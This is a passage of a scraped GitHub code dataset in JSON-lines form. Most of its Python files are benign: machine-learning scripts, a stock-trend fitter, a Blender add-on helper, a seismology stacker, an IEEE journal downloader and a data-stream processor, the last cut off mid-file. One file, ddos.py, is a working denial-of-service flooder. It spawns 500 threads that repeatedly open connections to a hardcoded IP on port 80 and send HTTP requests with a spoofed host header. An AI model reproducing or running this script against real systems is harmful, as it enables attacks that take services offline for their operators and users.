param_grid=param_grid, cv=5, verbose=3)\r\nCV_cwgbs.fit(X_train, y_train)\r\n\r\nprint(CV_cwgbs.best_params_)\r\n# {'dropout_rate': 0.0, 'learning_rate': 0.1, 'loss': 'ipcwls', 'n_estimators': 1000}\r\n# {'dropout_rate': 0.0, 'learning_rate': 0.1, 'loss': 'coxph', 'n_estimators': 100}\r\n# {'dropout_rate': 0.0, 'learning_rate': 0.1, 'loss': 'coxph', 'n_estimators': 1000}","repo_name":"k1rezaei/Survival-Analysis","sub_path":"dataset_and_other_models/grid_search_cwgbs.py","file_name":"grid_search_cwgbs.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70580664749","text":"# 12. Write a program that accepts a sequence of whitespace separated words as input and\n# prints the words after removing all duplicate words and\n# sorting them alphanumerically.\n# Suppose the following input is supplied to the program:\n# hello world and practice makes perfect and hello world again\n# Then, the output should be:\n# again and hello makes perfect practice world\n\nprint(\"Enter string\")\nstring = input(\">>> \")\n\nstring_list = string.split(\" \")\nunique_words = list(set(string_list))\nunique_words.sort()\n\nprint(\" \".join(unique_words))\n","repo_name":"JangirSumit/data_science","sub_path":"11th-12th May Assignments/case study 1/question_12.py","file_name":"question_12.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"3904769917","text":"import os;\ntmp = \"\";\ntmp2 = \"\";\nwhile 1 == 1:\n\ttmp = tmp = os.popen(\"mpc current\").read();\n\tif tmp != tmp2:\n\t\ttmp2 = tmp = os.popen(\"mpc current\").read();\n\t\tfile = open(\"/var/www/html/current.html\",\"w\");\n\t\tfile.write(\"<!DOCTYPE html><html><head><meta charset='utf-8'><meta http-equiv='refresh' content='1'><title>
</title></head><body>\");\n\t\tfile.write(str(tmp2));\n\t\tfile.write(\"</body></html>
\")\n\t\tfile.close();\n","repo_name":"Anton-Kuscher/PiPlayer","sub_path":"home/pi/webinterface/getcurrent.py","file_name":"getcurrent.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37884987042","text":"# @author Shaw Young\r\n# @version 10.24.21\r\n\r\nimport yfinance as yf\r\nimport numpy as np\r\n# from numpy import arange\r\n# from matplotlib import pyplot\r\nfrom csv import DictReader\r\nimport pickle\r\nfrom lmfit.models import ExpressionModel\r\n\r\n# Parses through all tickers in a csv file sourced from the NASDAQ \r\n# and determines a Key Performance Indicator (KPI) for each security\r\ndef parse_thru_tickers():\r\n    out = dict()\r\n    with open('snp500.csv', 'r') as read_obj:\r\n        reader = DictReader(read_obj)\r\n        for row in reader:\r\n            try:\r\n                out[row['Symbol']] = lin_reg_ticker(row['Symbol'])\r\n            except ValueError:\r\n                break\r\n\r\n    return out\r\n# Exponential Function\r\ndef func(x, a, b, c):\r\n\treturn a*np.exp(b*x) + c\r\n\r\n# Input is a ticker - outputs a KPI calculated\r\n# by using an Exponential regression\r\ndef lin_reg_ticker(t):\r\n    x = list()\r\n    y = list() \r\n    i = 0\r\n\r\n    ticker_data = yf.Ticker(t)\r\n    ticker_historical = ticker_data.history(period=\"max\", interval=\"3mo\")\r\n    \r\n    for index, row in ticker_historical.iterrows():\r\n        if not np.isnan(row['Low']):\r\n            y.append(row['Low'])\r\n            x.append(i)\r\n            i = i+1\r\n    \r\n    try:\r\n        # Weighted Exponential Regression\r\n        exponential_model = ExpressionModel(\"a * exp(b * x) + c\", [\"x\"], None, 'omit' )\r\n        fitted_model = exponential_model.fit(np.asarray(y), x=np.asarray(x), a=5, b=1, c=1)\r\n        KPI = fitted_model.params['a'].value\r\n        return KPI\r\n    \r\n    except: \r\n        return -1\r\n\r\n    # To print a plot of the linear regression \r\n    # \r\n    # pyplot.scatter(x,y)\r\n    # x_line = arange(min(x), max(x), 1) \r\n    # y_line = func(x_line, a, b, c)\r\n    # pyplot.plot(x_line, y_line, '--', color='red')\r\n    # pyplot.savefig(\"plot\")\r\n\r\nif __name__ == \"__main__\":\r\n    out = parse_thru_tickers()\r\n    pickle_out = open(\"KPIs.pickle\",\"wb\")\r\n    pickle.dump(out, pickle_out)\r\n    pickle_out.close()","repo_name":"BenAltermatt/EthicalInvesting","sub_path":"assess_value.py","file_name":"assess_value.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38780394047","text":"# Nikita Akimov\r\n# interplanety@interplanety.org\r\n#\r\n# GitHub\r\n#   https://github.com/Korchy/BIS\r\n\r\n\r\nimport os\r\nimport bpy\r\nimport zipfile\r\nfrom .file_manager import FileManager\r\n\r\n\r\nclass DataBlockManager:\r\n\r\n    # abstract class for common data block for saving/loading it in BIS\r\n\r\n    _limit_file_size = 3*1024*1024  # max exported to .blend and zipped file size (3 Mb)\r\n\r\n    @classmethod\r\n    def export_to_blend(cls, context, data_block: set, export_path: str, export_file_name: str):\r\n        # saves data block to the export_path directory in a *.blend format and zip it. 
Returns full path to the file\n rez = None\n if data_block:\n file_name = export_file_name + '.blend'\n file_path = os.path.join(export_path, file_name)\n context.blend_data.libraries.write(file_path, data_block)\n if os.path.exists(file_path):\n zip_file_name = export_file_name + '.zip'\n zip_file_path = os.path.join(export_path, zip_file_name)\n zip_file = zipfile.ZipFile(zip_file_path, 'w')\n zip_file.write(\n filename=file_path,\n compress_type=zipfile.ZIP_DEFLATED,\n arcname=file_name\n )\n zip_file.close()\n if os.path.exists(zip_file_path):\n if os.stat(zip_file_path).st_size < cls._limit_file_size:\n rez = zip_file_path\n else:\n bpy.ops.bis.messagebox(\n 'INVOKE_DEFAULT',\n message='ERR: Saving meshes must be less ' +\n str(round(cls._limit_file_size/1024/1024)) +\n ' Mb after zip export'\n )\n else:\n bpy.ops.bis.messagebox('INVOKE_DEFAULT', message='ERR: No data to save')\n return rez\n\n @classmethod\n def import_from_blend(cls, context, zip_file_path, file_name, data_block_type, data_block_name=None):\n # add meshes to scene from zipped archive with *.blend file\n rez = []\n # import data block from .blend file\n if os.path.exists(zip_file_path):\n path = os.path.dirname(zip_file_path)\n full_path = os.path.join(path, file_name + '.blend')\n FileManager.unzip_files(\n source_zip_path=zip_file_path,\n dest_dir=path\n )\n if os.path.exists(full_path):\n with bpy.data.libraries.load(full_path) as (data_from, data_to):\n if data_block_name is None:\n setattr(\n data_to,\n data_block_type,\n getattr(data_from, data_block_type)\n )\n else:\n setattr(\n data_to,\n data_block_type,\n [name for name in getattr(data_from, data_block_type) if name == data_block_name]\n )\n rez = getattr(data_to, data_block_type)[:] # list of data block names\n return rez\n","repo_name":"Korchy/BIS","sub_path":"data_block_manager.py","file_name":"data_block_manager.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"23399189155","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# by TR\n\"\"\"\nstack and plot rfs by azimuth\n\n\"\"\"\nfrom sito import read, imaging\nfrom glob import glob\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\nfrom matplotlib.colorbar import ColorbarBase\n\npath = '/home/richter/Results/IPOC/receiver/2012_mag5.5/'\nazi_path = path + '/azi_stack/'\nplotdir = azi_path + 'plots/'\n\ndef getFig(num=0, ratio=1.5, margin=None, **kwargs):\n axes = [1. 
{"seq_id":"23399189155","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# by TR\n\"\"\"\nstack and plot rfs by azimuth\n\n\"\"\"\nfrom sito import read, imaging\nfrom glob import glob\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\nfrom matplotlib.colorbar import ColorbarBase\n\npath = '/home/richter/Results/IPOC/receiver/2012_mag5.5/'\nazi_path = path + '/azi_stack/'\nplotdir = azi_path + 'plots/'\n\ndef getFig(num=0, ratio=1.5, margin=None, **kwargs):\n axes = [1. - 0.1 * num] + [0.1] * num\n if margin is None:\n margin = [1.7, 1.3, 1.1, 0.3] #left, right, bottom, top\n fig = imaging.getFigure(axes, width=15., margin=margin, ratio=ratio,\n fontsize=12, labelsize='small', **kwargs)\n return fig\n\n\ndef cosmetic(station, fig):\n bins = np.arange(18) * 20 + 10\n if station in ('PB01',):\n fig.axes[0].set_yticks(bins)\n fig.axes[0].set_yticks((), minor=True)\n fig.axes[0].set_yticklabels([str(bi) * ((i + 1) % 2)\n for i, bi in enumerate(bins)])\n fig.axes[0].set_ylim((-20, 380))\n\ndef plot(station='*'):\n start = -5\n end = 22\n show = False\n for file_ in glob(azi_path + station + '_azi_stack.QHD'):\n ms = read(file_)\n station = ms[0].stats.station\n ratio = (len(ms) * 0.5 + 1.4 + 0.4 * 2.54) / 15\n ratio = min(ratio, 2.)\n fig = getFig(ratio=ratio)\n alpha = None\n num_tr = np.sum(np.array(ms.getHI('count')))\n if num_tr >= 100:\n alpha = ['count', 20, 0, 1., 0.]\n elif num_tr >= 50:\n alpha = ['count', 10, 0, 1., 0.]\n else:\n alpha = ['count', 5, 0, 1., 0.]\n plot = ms.plotRF(start, end, yaxis='azi', ylabel=u'azi (°)', show=show,\n fig=fig, scale=360 / len(ms), plotinfo=('sum',), plotinfowhere=('top',),\n alpha=alpha)\n if alpha is not None:\n #http://matplotlib.sourceforge.net/examples/api/colorbar_only.html\n ax2 = plot.fig.add_axes([0.94, 0.2, 0.01, 0.6])\n norm = colors.Normalize(vmin=0, vmax=alpha[1])\n ColorbarBase(ax2, cmap='Greys', norm=norm, extend='max')\n cosmetic(station, plot.fig)\n plot.fig.savefig(plotdir + 'rf_azistack_%s_Q.pdf' % station)\n plt.close(plot.fig)\n\ndef calculate(station='*'):\n for file_ in glob(path + station + '_mout.QHD'):\n ms = read(file_).select(component='Q', expr='not st.mark')\n station = ms[0].stats.station\n if len(ms) >= 100:\n bins = np.arange(19) * 20\n elif len(ms) >= 50:\n bins = np.arange(13) * 30\n else:\n bins = np.arange(7) * 60\n ms = ms.getBinnedStream(bins, header='azi')\n ms.write(azi_path + '%s_azi_stack' % station, 'Q')\n\ncalculate()\nplot()\n","repo_name":"trichter/sito","sub_path":"bin/rf/rf_stack_azi.py","file_name":"rf_stack_azi.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"}
{"seq_id":"6463315085","text":"import numpy as np\nimport tflearn\n\n# Load CSV file, indicate that the first column represents labels\nfrom tflearn.data_utils import load_csv\ndata, labels = load_csv('cyprus_train_model.csv', target_column=0,\n categorical_labels=True, n_classes=6)\n\n# Build neural network\n# 9 inputs (3 areas for 3 previous days)\nnet = tflearn.input_data(shape=[None, 9])\nnet = tflearn.fully_connected(net, 32)\nnet = tflearn.fully_connected(net, 32)\n# 6 possible outputs\nnet = tflearn.fully_connected(net, 6, activation='softmax')\nnet = tflearn.regression(net)\n\n# Define model\nmodel = tflearn.DNN(net, tensorboard_verbose=3)\n# Start training (apply gradient descent algorithm)\nmodel.fit(data, labels, n_epoch=10, batch_size=16, show_metric=True)\n\nmodel.save(\"cyprus.tflearn\")\n","repo_name":"valentinalexeev/2018SAC-airalert","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17124427843","text":"import functools\nimport shutil\n\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List, Optional\n\nimport requests\n\nfrom ieee_csdl_downloader.config import debug_mode, get_download_dir, get_download_start_year, get_ieee_csdl_cookies, get_ieee_spectrum_cookies\nfrom ieee_csdl_downloader.constants import GRAPH_QL_QUERY, TODAY\nfrom ieee_csdl_downloader.data import get_pub_formats, get_pub_month\nfrom ieee_csdl_downloader.pdf import unzip_and_merge\nfrom ieee_csdl_downloader.publications import Publication\n\n\ndef download_file(\n download_url: str,\n download_path: Optional[Path] = None,\n cookies: Optional[dict] = None,\n) -> None: # pragma: nocover\n if not download_path:\n download_path = Path(get_download_dir() / download_url.split('/')[-1].split('?')[0])\n\n with requests.get(download_url, stream=True, cookies=cookies) as r:\n with open(download_path, 'wb') as f:\n # See the below links:\n # - https://stackoverflow.com/questions/16694907/download-large-file-in-python-with-requests#comment95588469_39217788\n # - https://github.com/psf/requests/issues/2155#issuecomment-50771010\n r.raw.read = functools.partial(r.raw.read, decode_content=True)\n\n shutil.copyfileobj(r.raw, f)\n\n\ndef get_publication_directory(pub_name: str):\n return Path(get_download_dir() / pub_name)\n\n\ndef get_local_filename(\n year: int,\n month: str,\n pub_name: str,\n vol: str,\n issue: int,\n filetype: str,\n postfix: str = '',\n) -> Path:\n filename = f'{year}-{month} - {pub_name} - Volume{vol} - Issue{issue}{postfix}.{filetype}'\n return get_publication_directory(pub_name) / filename\n\n\ndef get_publication_graphql(year: int, issue: int, publication: Publication) -> dict: # pragma: nocover\n # GraphQL query to get the month of the publication\n r = requests.post(\n url='https://www.computer.org/csdl/api/v1/graphql',\n json={\n 'operationName': None,\n 'variables': {\n 'announcementsCategoryId': '819',\n 'cfpCategoryId': '857',\n 'idPrefix': publication.url_indicator,\n 'issueNum': str(issue).zfill(2),\n 'year': str(year),\n 'limitResults': 100,\n 'skipResults': 0,\n },\n 'query': GRAPH_QL_QUERY,\n },\n allow_redirects=True,\n cookies=get_ieee_csdl_cookies(),\n )\n json_data = r.json()\n return json_data\n\n\ndef download_publications_from_ieee_csdl() -> None: # pragma: nocover\n get_download_dir().mkdir(parents=True, exist_ok=True)\n\n download_problems: List[str] = []\n\n for pub in Publication.from_config():\n\n # Create the directory for this publication\n get_publication_directory(pub_name=pub.name).mkdir(exist_ok=True)\n\n years = [2022] if debug_mode() else range(pub.start_year, (pub.end_year if pub.end_year else TODAY.year) + 1)\n # Iterate over all the desired years & issues to get the media.\n for year in years:\n\n if get_download_start_year() and year < get_download_start_year():\n print(f'[{datetime.now().isoformat()}] Skipping {year} for {pub.name}; config says last download was {get_download_start_year()}')\n continue\n\n for issue in pub.issues:\n json_data = get_publication_graphql(year=year, issue=issue, publication=pub)\n pub_month = get_pub_month(json_data=json_data)\n pub_formats = get_pub_formats(json_data=json_data)\n if not pub_month:\n continue\n month = str(pub_month).zfill(2)\n\n file_fn = lambda file_type, postfix='': get_local_filename( # noqa: E731\n year=year,\n month=month,\n pub_name=pub.name,\n vol=str(year - (pub.start_year - 1)).zfill(2),\n issue=issue,\n filetype=file_type,\n postfix=postfix,\n )\n\n # Download each of the desired files.\n for filetype in pub_formats:\n print(f'[{datetime.now().isoformat()}] Downloading [{pub.name}] issue ' f'for {year}-{month} (Issue {issue} - {filetype:4})...', end='')\n url = build_download_url(pub, year, issue, filetype)\n\n local_file = file_fn(file_type=filetype)\n\n # Minus 1 from month because sometimes issues are published a bit early.\n if year >= TODAY.year and int(month) - 1 > TODAY.month:\n print('Future Issue; skipping!')\n continue\n\n if local_file.exists():\n print('Already Downloaded; skipping!')\n continue\n\n r = requests.head(\n url=url,\n allow_redirects=True,\n cookies=get_ieee_csdl_cookies(),\n )\n if r.status_code == 403:\n print('File does not exist; skipping!')\n continue\n\n if r.status_code != 200:\n print('Status Code != 200; skipping!\\n')\n print('[ERROR] Please try updating the value of `CSDL_AUTH_COOKIE` and re-running the program.')\n print('Exiting.')\n exit(1)\n\n redirected_url = r.url\n download_file(download_url=redirected_url, download_path=local_file)\n print('Success!')\n\n # If the zip file exists, but not the PDF; create zip\n pdf = file_fn(file_type='pdf')\n zip = file_fn(file_type='zip')\n if zip.exists() and not pdf.exists():\n timestamp = datetime.now().isoformat()\n print(f'[{timestamp}] No PDF downloaded for {year}-{month} (Issue {issue})...')\n print(f'[{timestamp}] \\\\------ extracting zip and creating...', end='')\n\n merged_pdf_name = file_fn(file_type='pdf', postfix=' - MERGED_FROM_ZIP')\n if merged_pdf_name.exists():\n print('Merged PDF exists; skipping!')\n continue\n\n unzip_and_merge(merged_pdf_name, zip)\n print('Success!')\n\n if download_problems:\n print('Problems Downloading:')\n print('===================')\n for download_problem in download_problems:\n print(f' - {download_problem}')\n\n\ndef build_download_url(pub, year, issue, filetype):\n url = f'https://www.computer.org/csdl/api/v1/periodical/{pub.type}/{pub.url_indicator}' f'/{year}/{str(issue).zfill(2)}/download-issue/{filetype}'\n return url\n\n\ndef download_ieee_spectrum(): # pragma: nocover\n r = requests.get(\n url='https://spectrum.ieee.org/core/users/settings.js',\n cookies=get_ieee_spectrum_cookies(),\n )\n\n if r.status_code != 200:\n print('Status Code != 200; skipping downloading IEEE Spectrum!\\n')\n print('[ERROR] Please try updating the value of `IEEE_SPECTRUM_SESSIONID` and re-running the program.')\n print('Exiting.')\n exit(1)\n\n pages = r.json().get('parent_site', {}).get('pages', [])\n filtered_pages = filter(\n lambda page: (\n page.get('about_html').endswith('.pdf')\n and '/files/' in page.get('about_html')\n and (page.get('isPublic', False) is True or page.get('isUnlisted', False) is True)\n ),\n pages,\n )\n sorted_filtered_pages = list((sorted(filtered_pages, key=lambda d: datetime.strptime(d['title'], '%B %Y'))))\n for page in sorted_filtered_pages:\n about_html = page.get('about_html')\n download_url = about_html if about_html.startswith('https://') else f'https://spectrum.ieee.org{about_html}'\n\n title = page['title']\n file_date = datetime.strptime(title, '%B %Y')\n\n if get_download_start_year() and file_date.year < get_download_start_year():\n print(f'[{datetime.now().isoformat()}] Skipping {file_date.year} for IEEE Spectrum; config says last download was {get_download_start_year()}')\n continue\n\n filename = f'{file_date.year}-{str(file_date.month).zfill(2)} - IEEE Spectrum - {title}.pdf'\n download_path = Path(f'{get_download_dir()}/IEEE Spectrum/{filename}').absolute()\n\n if download_path.exists():\n print(f'Skipping [{download_path}]; file exists.')\n continue\n\n print(f'Downloading [{download_url}] to [{download_path}]')\n download_file(download_url=download_url, download_path=download_path, cookies=get_ieee_spectrum_cookies())\n\n\n# RUN VIA: `source activate && python3 -m ieee_csdl_downloader.download && deactivate`\nif __name__ == '__main__': # pragma: nocover\n download_publications_from_ieee_csdl()\n download_ieee_spectrum()\n","repo_name":"ChrisCarini/ieee-csdl-downloader","sub_path":"ieee_csdl_downloader/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":9063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"10194659662","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\nimport argparse\n\nfrom cocoprep.archive_load_data import create_path, get_file_name_list, parse_old_arhive_file_name, parse_range\nfrom cocoprep.archive_exceptions import PreprocessingException, PreprocessingWarning\n\n\n# noinspection PyTypeChecker\ndef reformat_archives(input_path, output_path, functions, instances, dimensions):\n \"\"\"\n The names of the files in the input_path have the following notation:\n f[f1]-[f2]_i[i1]-[i2]_[d]D.txt\n where f1 and f2 are function numbers used for the first and second objective, i1 and i2 are instance numbers of the\n two functions and d is the dimension (one among 2, 3, 5, 10 and 20). Each such file starts with a few lines of\n comments that start with '#', after which each line corresponds to one solutions. In files with d <= 5 the solution\n is represented by its decision and objective vector values, while files with d > 5 contain only objective vector\n values of each solution.\n\n The output files to be written to output_path have the following notation:\n [suite_name]_f[F]_i[I]_d[D]_nondominated.adat\n where F is the function number in the suite, I is the instance number and D is the dimension. One file contains\n only one instance and starts with a line '% instance = I', where I is the instance number and is followed by a\n commented line (starting with '%'). In the subsequent lines, the solutions are written in the following format:\n num obj1 obj2 dec1 ... decn\n where num is the evaluation number of the solution (0 for extreme solutions and 1 for solutions read from the old\n file format), obj1 and obj2 are its objective values, and dec1, ... are its decision values (if they are given).\n\n Note this implementation is concerned only with the 'bbob-biobj' suite and applies reformatting only on the archive\n files that correspond to the problems contained in this suite.\n\n :param input_path: path to the folder with input archives\n :param output_path: path to the folder where output archives are stored to, if any files already exist there, they\n get appended to\n :param functions: list of function numbers to be included in the reformatting\n :param instances: list of instance numbers to be included in the reformatting\n :param dimensions: list of dimensions to be included in the reformatting\n \"\"\"\n suite_name = 'bbob-biobj'\n print('Reformatting archive files for the {} suite...'.format(suite_name))\n\n # Check whether input path exists\n input_files = get_file_name_list(input_path, \".txt\")\n if len(input_files) == 0:\n raise PreprocessingException('Folder {} does not exist or is empty'.format(input_path))\n\n # Create output folder if it does not exist yet\n create_path(output_path)\n\n # Read the input files one by one\n for input_file in input_files:\n\n try:\n (function, instance, dimension) = parse_old_arhive_file_name(input_file)\n if (function not in functions) or (instance not in instances) or (dimension not in dimensions):\n continue\n except PreprocessingWarning as warning:\n print('Skipping file {}\\n{}'.format(input_file, warning))\n continue\n\n # Open the output file\n output_file = os.path.join(output_path, '{}_f{:02d}_i{:02d}_d{:02d}_nondominated.adat'.format(suite_name,\n function,\n instance,\n dimension))\n\n with open(input_file, 'r') as f_in:\n with open(output_file, 'a') as f_out:\n # Perform reformatting\n\n print(input_file)\n f_out.write('% instance = {}\\n%\\n'.format(instance))\n\n for line in f_in:\n if line[0] == '#':\n continue\n\n if dimension <= 5:\n f_out.write('1 \\t{} \\t{}\\n'.format(' \\t'.join(line.split()[dimension:dimension+2]),\n ' \\t'.join(line.split()[0:dimension])))\n else:\n f_out.write('1 \\t{}\\n'.format(' \\t'.join(line.split()[0:2])))\n\n f_out.close()\n f_in.close()\n print('Done!')\n\n\nif __name__ == '__main__':\n \"\"\"Performs reformatting of the archives of solutions from the old format (by Do) to the new one.\n\n Archives from the input path are read, reformatted and stored in the output path.\n \"\"\"\n import timing\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--functions', type=parse_range, default=range(1, 56),\n help='function numbers to be included in the processing of archives')\n parser.add_argument('-i', '--instances', type=parse_range, default=range(1, 11),\n help='instance numbers to be included in the processing of archives')\n parser.add_argument('-d', '--dimensions', type=parse_range, default=[2, 3, 5, 10, 20, 40],\n help='dimensions to be included in the processing of archives')\n parser.add_argument('output', help='path to the output folder')\n parser.add_argument('input', help='path to the input folder')\n args = parser.parse_args()\n\n print('Program called with arguments: \\ninput folder = {}\\noutput folder = {}'.format(args.input, args.output))\n print('functions = {} \\ninstances = {}\\ndimensions = {}\\n'.format(args.functions, args.instances, args.dimensions))\n\n # Reformat the archives\n reformat_archives(args.input, args.output, args.functions, args.instances, args.dimensions)\n","repo_name":"numbbo/coco","sub_path":"code-preprocessing/archive-update/archive_reformat.py","file_name":"archive_reformat.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"37"}
{"seq_id":"72239650666","text":"import socket # USED TO CREATE CLIENT-SERVER APPS\nimport threading\n\n# setting target ip\ntarget = '192.168.0.19'\nfake_ip = '182.15.20.8'\nport = 80 # shut down http port\nattack_num = 0 # shared request counter (was previously used before being initialized)\n\ndef attack():\n while True:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# AF_INET is the Internet address family for IPv4. SOCK_STREAM is the socket type for TCP, the protocol that will be used to transport messages in the network.\n s.connect((target, port)) # uses .connect() to connect to the server (victim)\n s.sendto((\"GET /\" + target + \" HTTP/1.1\\r\\n\").encode('ascii'), (target, port))\n s.sendto((\"Host: \" + fake_ip + \"\\r\\n\\r\\n\").encode('ascii'), (target, port))\n global attack_num\n attack_num += 1\n print(attack_num)\n s.close()\n# By using multi-threading, we can send many requests at once\nfor i in range(500):\n thread = threading.Thread(target=attack)\n thread.start()\n","repo_name":"ferrindsouza/ferrindsouza.github.io","sub_path":"ddos.py","file_name":"ddos.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"39425386111","text":"import time\nimport shutil\nimport sys\nfrom pyspark import SparkContext, SparkConf\n#from core import CC\n#from core.kafka_consumer import spark_kafka_consumer\n#from core.kafka_to_cc_storage_engine import kafka_to_db\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.sql import SparkSession, SQLContext\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\nfrom pyspark.ml.feature import Tokenizer, RegexTokenizer, StopWordsRemover, CountVectorizer\n\n##########################################\nimport json\nimport os\nimport imp\nfrom cerebralcortex.kernel.datatypes.datastream import DataStream\nfrom datetime import datetime, timezone, timedelta\nfrom cerebralcortex.kernel.utils.logging import cc_log\nfrom threading import Thread\nfrom importlib import import_module\n\n###################################\nfrom cerebralcortex.CerebralCortex import CerebralCortex\n\n#Sandeep: Give path to .yml file of APIServer\nconfiguration_file = os.path.join(os.path.dirname(__file__), 'cerebralcortex_apiserver.yml')\nCC = CerebralCortex(configuration_file, time_zone=\"America/Los_Angeles\", load_spark=False)\n\n################################## Global variables\n# filelist = []\n# cur_time = 1513236910 #hard coded, should use datetime.now() in the future\n# let user define start time\n\n###################################\nfrom pyspark.streaming.kafka import KafkaDStream\n#from core.kafka_offset import storeOffsetRanges\nfrom cerebralcortex.kernel.utils.logging import cc_log\n\ndef verify_fields(msg):\n if \"metadata\" in msg and \"data\" in msg:\n# print(\"Batch size \" + str(len(msg[\"data\"])))\n return True\n return False\n\ndef store_streams(data):\n try:\n st = datetime.now()\n CC.save_datastream_to_influxdb(data)\n CC.save_datastream(data, \"json\")\n print(\"Stream Saved: \", data['filename'], (datetime.now()-st))\n except:\n cc_log()\n\n# def kafka_to_db(message: KafkaDStream):\n# \"\"\"\n#\n# :param message:\n# \"\"\"\n# records = message.map(lambda r: json.loads(r[1]))\n# valid_records = records.filter(verify_fields)\n#\n# valid_records.foreach(lambda stream_data: store_streams(stream_data))\n#\n# storeOffsetRanges(message)\n#\n# print(\"Ready to process stream...\")\n##################################\n\n#util module files\nimport gzip\nfrom pympler import asizeof\nfrom cerebralcortex.kernel.datatypes.datastream import DataStream, DataPoint\nfrom dateutil.parser import parse\n\n\ndef get_gzip_file_contents(file_name: str) -> str:\n \"\"\"\n Read and return gzip compressed file contents\n :param file_name:\n :return:\n \"\"\"\n fp = gzip.open(file_name)\n gzip_file_content = fp.read()\n fp.close()\n gzip_file_content = gzip_file_content.decode('utf-8')\n return gzip_file_content\n\n\ndef chunks(data: str, max_len: int) -> str:\n \"\"\"\n Yields max_len sized chunks with the remainder in the last\n :param data:\n :param max_len:\n \"\"\"\n for i in range(0, len(data), max_len):\n yield data[i:i + max_len]\n\n\ndef get_chunk_size(data):\n\n if len(data) > 0:\n chunk_size = 750000/(asizeof.asizeof(data)/len(data)) #0.75MB chunk size without metadata\n return round(chunk_size)\n else:\n return 100\n\n\ndef row_to_datapoint(row: str) -> dict:\n \"\"\"\n Format data based on mCerebrum's current GZ-CSV format into what Cerebral\n Cortex expects\n :param row:\n :return:\n \"\"\"\n ts, offset, values = row.split(',', 2)\n ts = int(ts) / 1000.0\n offset = int(offset)\n\n if isinstance(values, tuple):\n values = list(values)\n else:\n try:\n values = json.loads(values)\n except:\n try:\n values = [float(values)]\n except:\n try:\n values = list(map(float, values.split(',')))\n except:\n values = values\n\n tz = timezone(timedelta(milliseconds=offset))\n ts = datetime.fromtimestamp(ts, tz)\n return DataPoint(start_time=ts, sample=values)\n #return {'starttime': str(ts), 'value': values}\n\n\ndef rename_file(old: str):\n \"\"\"\n\n :param old:\n \"\"\"\n old_file_name = old.rsplit('/', 1)[1]\n new_file_name = \"PROCESSED_\" + old_file_name\n new_file_name = str.replace(old, old_file_name, new_file_name)\n # if os.path.isfile(old):\n # os.rename(old, new_file_name)\n\n##########################\ndef json_to_datapoints(json_obj):\n if isinstance(json_obj[\"value\"], str):\n sample = json_obj[\"value\"]\n else:\n sample = json.dumps(json_obj[\"value\"])\n start_time = parse(json_obj[\"starttime\"])\n\n if \"endtime\" in json_obj: # Test-code, this if will not be executed\n return DataPoint(start_time=start_time, end_time=json_obj[\"endtime\"], sample=sample)\n else:\n return DataPoint(start_time=start_time, sample=sample)\n\n\ndef json_to_datastream(json_obj, stream_type):\n data = json_obj[\"data\"]\n metadata = json_obj[\"metadata\"]\n identifier = metadata[\"identifier\"]\n owner = metadata[\"owner\"]\n name = metadata[\"name\"]\n data_descriptor = metadata[\"data_descriptor\"]\n execution_context = metadata[\"execution_context\"]\n annotations = metadata[\"annotations\"]\n stream_type = stream_type\n start_time = data[0][\"starttime\"]\n end_time = data[len(data) - 1][\"starttime\"]\n datapoints = list(map(json_to_datapoints, data))\n\n return DataStream(identifier,\n owner,\n name,\n data_descriptor,\n execution_context,\n annotations,\n stream_type,\n start_time,\n end_time,\n datapoints)\n\n#################################\nfrom cerebralcortex.kernel.datatypes.datastream import DataStream\nfrom datetime import datetime\nfrom cerebralcortex.kernel.utils.logging import cc_log\n#from core.kafka_offset import storeOffsetRanges\nfrom pyspark.streaming.kafka import KafkaUtils, KafkaDStream, OffsetRange, TopicAndPartition\nfrom pyspark.sql import Row, SparkSession\n#from util.util import row_to_datapoint, chunks, get_gzip_file_contents, rename_file\n\n\ndef verify_fields(msg: dict, data_path: str) -> bool:\n \"\"\"\n Verify whether msg contains file name and metadata\n :param msg:\n :param data_path:\n :return:\n \"\"\"\n if \"metadata\" in msg and \"filename\" in msg:\n if os.path.isfile(data_path + msg[\"filename\"]):\n return True\n return False\n\n\ndef file_processor(msg: dict, data_path: str) -> DataStream:\n \"\"\"\n :param msg:\n :param data_path:\n :return:\n \"\"\"\n if not isinstance(msg[\"metadata\"],dict):\n metadata_header = json.loads(msg[\"metadata\"])\n else:\n metadata_header = msg[\"metadata\"]\n\n identifier = metadata_header[\"identifier\"]\n owner = metadata_header[\"owner\"]\n name = metadata_header[\"name\"]\n data_descriptor = metadata_header[\"data_descriptor\"]\n execution_context = metadata_header[\"execution_context\"]\n if \"annotations\" in 